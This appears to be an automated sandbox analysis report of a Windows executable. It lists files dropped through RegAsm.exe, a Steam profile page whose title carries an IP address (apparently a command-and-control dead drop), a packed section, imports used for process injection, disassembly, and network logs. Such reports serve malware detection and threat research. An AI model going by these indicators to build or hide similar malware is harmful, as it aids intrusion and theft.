                                                                                                                                                                                                                                                            SHA-256:5674A8945E3F34BB724B162A002B48E5930315068E17D432BB5EF1D8154844EB
                                                                                                                                                                                                                                                            SHA-512:1D60A5EB00C2DA8E19BDF3FCA0A2C470F457DC6EDEE098C08B853C3205C06E54F880FF1B39FD326D41F1588035E97B38BBA74186903D7524AC3A94C8F8DD3804
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: p__o https://95.217.242.142|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link hr
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2459136
                                                                                                                                                                                                                                                            Entropy (8bit):6.052474106868353
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                                                                                                                                                                                                            MD5:90E744829865D57082A7F452EDC90DE5
                                                                                                                                                                                                                                                            SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                                                                                                                                                                                                            SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                                                                                                                                                                                                            SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):685392
                                                                                                                                                                                                                                                            Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                            MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                            SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                            SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                            SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):608080
                                                                                                                                                                                                                                                            Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                            MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                            SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                            SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                            SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):450024
                                                                                                                                                                                                                                                            Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                            MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                            SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                            SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                            SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2046288
                                                                                                                                                                                                                                                            Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                            MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                            SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                            SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                            SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):257872
                                                                                                                                                                                                                                                            Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                            MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                            SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                            SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                            SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):80880
                                                                                                                                                                                                                                                            Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                            MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                            SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                            SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                            SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (3935)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):3940
                                                                                                                                                                                                                                                            Entropy (8bit):5.819462425854772
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:Xgfn0li5H66668lBz9Iw1+3+n5KQNxFApWsTfQfffo:XgaCH66668b/umJvTsL
                                                                                                                                                                                                                                                            MD5:1BD5EC24503A3E68195848F600DE9C4D
                                                                                                                                                                                                                                                            SHA1:656EEAF022E3A3824B80A226D472A16158761011
                                                                                                                                                                                                                                                            SHA-256:3E0EFAE827AC7DDA0BBB559FC456A39DEE419535F1E9893F36D9AB8626A76130
                                                                                                                                                                                                                                                            SHA-512:90F0C60EEEBA8C90897872B4FE362DD08EF140E15221BCDF0060729DF1E3B6B54A90BAF67A1ED641E7E667A2AFE4021BAF0D151E28E83119410F7DA37787A503
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                            Preview:)]}'.["",["southwest airlines flights","xbox indie game showcase","challengers movie","tampa bay rays city connect uniforms","spacex falcon 9 rocket launches","million dollar baby tommy richman lyrics","royal caribbean alaska cruise cancelled","apple iphone 16 pro max"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"google:entityinfo":"Cg0vZy8xMXEzeWJ3M2tqEhlDaGFsbGVuZ2VycyDigJQgMjAyNCBmaWxtMv8QZGF0YTppbWFnZS9qcGVnO2Jhc2U2NCwvOWovNEFBUVNrWkpSZ0FCQVFBQUFRQUJBQUQvMndDRUFBa0dCd2dIQmdrSUJ3Z0tDZ2tMRFJZUERRd01EUnNVRlJBV0lCMGlJaUFkSHg4a0tEUXNKQ1l4Sng4ZkxUMHRNVFUzT2pvNkl5cy9SRDg0UXpRNU9qY0JDZ29LRFF3TkdnOFBHamNsSHlVM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOLy9BQUJFSUFFQUFRQU1CSWdBQ0VRRURFUUgveEFBYUFBQUNBd0VCQUFBQUFBQUFBQUFBQUFBRkJnSURCQWNCLzhRQU5SQUFBZ0VEQWdRREJRY0VBd0FBQUFBQUFRSURCQVVSQUNFR0VqRkJFeUpoVVhHQ
                                                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Entropy (8bit):7.525154724460251
                                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                            File name:file.exe
                                                                                                                                                                                                                                                            File size:368'128 bytes
                                                                                                                                                                                                                                                            MD5:b898ced2e152060f5770f1c6337006f6
                                                                                                                                                                                                                                                            SHA1:b607705b76412adecc350bd38994d94ca3870f5a
                                                                                                                                                                                                                                                            SHA256:716b19201a3109a3fb15b0401cb86a9be6df726c8b3a1a1c88cefb445457966b
                                                                                                                                                                                                                                                            SHA512:4abd4a0c23f8d92c722246cab49797a840ebfd3cd4b900ba310ff243c529149b887620cfee3241c1605e1ae5dab501ee17a8d4de0634c8c52792677b107029a7
                                                                                                                                                                                                                                                            SSDEEP:6144:YSgQdkTUGJXOjv5o1SDQadvOKfj7RG77sxEPqwt4vg51O+CNkvtPUavkb3eXr:1gSkTUGRODeaMKLtGfWLwCvRk1PJoeXr
                                                                                                                                                                                                                                                            TLSH:BA74E01575C1C032EA33193615F0D6B89A7EFCB00AA25D9FB7944F7E4F30682D721A6A
                                                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............e~..e~..e~.c.}..e~.c.{..e~.c.z..e~.c....e~..e...e~.r.z..e~.r.}..e~.r.{..e~.C.w..e~.C.|..e~.Rich.e~.........PE..L...@./f...
                                                                                                                                                                                                                                                            Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                            Entrypoint:0x4067b1
                                                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                            Time Stamp:0x662FF440 [Mon Apr 29 19:25:52 2024 UTC]
                                                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                                                            Import Hash:319c5a7bfce453072d64c94ea7770db9
                                                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                                                            call 00007F2B84D874ACh
                                                                                                                                                                                                                                                            jmp 00007F2B84D86D39h
                                                                                                                                                                                                                                                            cmp ecx, dword ptr [00429040h]
                                                                                                                                                                                                                                                            jne 00007F2B84D86EC3h
                                                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                                                            jmp 00007F2B84D877E9h
                                                                                                                                                                                                                                                            jmp 00007F2B84D879B9h
                                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                                                                            jmp 00007F2B84D86ECFh
                                                                                                                                                                                                                                                            push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                            call 00007F2B84D9129Ch
                                                                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                                                            je 00007F2B84D86ED1h
                                                                                                                                                                                                                                                            push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                            call 00007F2B84D8C3B7h
                                                                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                                                            je 00007F2B84D86EA8h
                                                                                                                                                                                                                                                            pop ebp
                                                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                                                            cmp dword ptr [ebp+08h], FFFFFFFFh
                                                                                                                                                                                                                                                            je 00007F2B84D818FCh
                                                                                                                                                                                                                                                            jmp 00007F2B84D8798Eh
                                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                                                                            push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                            call 00007F2B84D8797Eh
                                                                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                                                                            pop ebp
                                                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                                                                            test byte ptr [ebp+08h], 00000001h
                                                                                                                                                                                                                                                            push esi
                                                                                                                                                                                                                                                            mov esi, ecx
                                                                                                                                                                                                                                                            mov dword ptr [esi], 004201C0h
                                                                                                                                                                                                                                                            je 00007F2B84D86ECCh
                                                                                                                                                                                                                                                            push 0000000Ch
                                                                                                                                                                                                                                                            push esi
                                                                                                                                                                                                                                                            call 00007F2B84D86E9Dh
                                                                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                                                                            mov eax, esi
                                                                                                                                                                                                                                                            pop esi
                                                                                                                                                                                                                                                            pop ebp
                                                                                                                                                                                                                                                            retn 0004h
                                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                                                                            mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                            push esi
                                                                                                                                                                                                                                                            mov ecx, dword ptr [eax+3Ch]
                                                                                                                                                                                                                                                            add ecx, eax
                                                                                                                                                                                                                                                            movzx eax, word ptr [ecx+14h]
                                                                                                                                                                                                                                                            lea edx, dword ptr [ecx+18h]
                                                                                                                                                                                                                                                            add edx, eax
                                                                                                                                                                                                                                                            movzx eax, word ptr [ecx+06h]
                                                                                                                                                                                                                                                            imul esi, eax, 28h
                                                                                                                                                                                                                                                            add esi, edx
                                                                                                                                                                                                                                                            cmp edx, esi
                                                                                                                                                                                                                                                            je 00007F2B84D86EDBh
                                                                                                                                                                                                                                                            mov ecx, dword ptr [ebp+0Ch]
                                                                                                                                                                                                                                                            cmp ecx, dword ptr [edx+0Ch]
                                                                                                                                                                                                                                                            jc 00007F2B84D86ECCh
                                                                                                                                                                                                                                                            mov eax, dword ptr [edx+08h]
                                                                                                                                                                                                                                                            add eax, dword ptr [edx+0Ch]
                                                                                                                                                                                                                                                            cmp ecx, eax
                                                                                                                                                                                                                                                            jc 00007F2B84D86ECEh
                                                                                                                                                                                                                                                            add edx, 28h
                                                                                                                                                                                                                                                            cmp edx, esi
                                                                                                                                                                                                                                                            jne 00007F2B84D86EACh
                                                                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                                                                            pop esi
                                                                                                                                                                                                                                                            pop ebp
                                                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                                                            mov eax, edx
                                                                                                                                                                                                                                                            jmp 00007F2B84D86EBBh
                                                                                                                                                                                                                                                            push esi
                                                                                                                                                                                                                                                            call 00007F2B84D87930h
                                                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x27d400x28.rdata
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x5c0000x1b50.reloc
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x260f00x1c.rdata
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x260300x40.rdata
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x1f0000x13c.rdata
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                            .text0x10000x1d3fa0x1d40050c407ffee16b8a5cec615ba161f19f2False0.5775824652777778data6.616382048222286IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                            .rdata0x1f0000x94620x9600f8425faa469bdff91679712cd12a53e3False0.38739583333333333data4.652555179364448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                            .data0x290000x1eb40x1200fb631e0825eb8197994a1c9222e5d15aFalse0.1703559027777778DOS executable (block device driver \377\377\377\377,32-bit sector-support)2.9508121929568962IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                            .Shine0x2b0000x300c30x302003666f9151b5251c040dff65cf631fd87False0.9969358766233766data7.998317289137794IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                            .reloc0x5c0000x1b500x1c0017ece04041abecd06a6ded35e787867dFalse0.75data6.504308533790372IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                                                            KERNEL32.dllVirtualProtect, WaitForSingleObject, CreateRemoteThread, MultiByteToWideChar, GetStringTypeW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, GetCurrentProcess, TerminateProcess, CreateFileW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, HeapFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapAlloc, GetFileType, GetFileSizeEx, SetFilePointerEx, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap, HeapSize, WriteConsoleW
                                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                            Apr 29, 2024 22:12:51.004234076 CEST49678443192.168.2.4104.46.162.224
                                                                                                                                                                                                                                                            Apr 29, 2024 22:12:52.098006010 CEST49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                            Apr 29, 2024 22:12:57.158313036 CEST49730443192.168.2.423.210.138.105
                                                                                                                                                                                                                                                            Apr 29, 2024 22:12:57.158351898 CEST4434973023.210.138.105192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:12:57.158437014 CEST49730443192.168.2.423.210.138.105
                                                                                                                                                                                                                                                            Apr 29, 2024 22:12:57.179770947 CEST49730443192.168.2.423.210.138.105
                                                                                                                                                                                                                                                            Apr 29, 2024 22:12:57.179790020 CEST4434973023.210.138.105192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:12:57.414669037 CEST4434973023.210.138.105192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:12:57.414861917 CEST49730443192.168.2.423.210.138.105
